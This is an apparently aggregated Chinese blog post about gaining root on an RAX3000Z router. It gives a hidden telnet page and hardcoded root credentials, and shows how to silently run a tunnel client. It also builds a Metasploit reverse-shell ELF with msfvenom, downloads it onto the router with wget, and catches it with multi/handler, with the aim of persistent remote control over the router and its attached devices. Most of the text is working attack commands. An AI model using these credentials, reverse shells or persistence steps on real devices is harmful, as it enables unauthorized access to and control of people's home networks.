





















RAX3000Z路由器cpu架构:armv7l,软件版本:RAX3000-ZXW.ZD.06,硬件版本:HV4.0.0


开telnet功能:
1.先user用户登录192.168.10.1
2.http://192.168.10.1/ch/telnet.html打开telnet开关
3.账号:CMCCAdmin,密码:wE%AnmFq,进去就是root权限
其他功能:
http://192.168.10.1/randddebug.html是在线升级页面
http://192.168.10.1/ch/router_info.html是主机信息。
内网穿透:
在公网机用python起http服务,可供下载vnt-arm-v7
路由器wget 公网机/vnt-cli
路由器后台静默运行vnt:/usr/bin/nohup /var/vnt-cli -s 公网机:端口 -k key> /dev/null 2>&1 &
在公网机用msf生成后门:
msfvenom -p linux/armle/shell_reverse_tcp LHOST=公网机 LPORT=监听端口 -f elf -o basic_shell.elf
在公网机起http服务提供下载后门,wget 公网机/basic_shell.elf
在公网机起msf运行参数:
use exploit/multi/handler
set payload linux/armle/shell_reverse_tcp
set lhost 公网机
set lport 监听端口

作用:实现路由器的持久化控制,无论走到哪,都能控制路由器下联的设备通断
踩过的坑:
1、各种尝试,无法开启ftp和ssh功能;
2、linux/armle/meterpreter/reverse_tcp不稳定一连即断,最好用linux/armle/shell_reverse_tcp,不稳定的原因大概率是路由器缺少运行 Meterpreter 所需的动态库。
此内容由惯性聚合(RSS阅读器)自动聚合整理,仅供阅读参考。 原文来自 — 版权归原作者所有。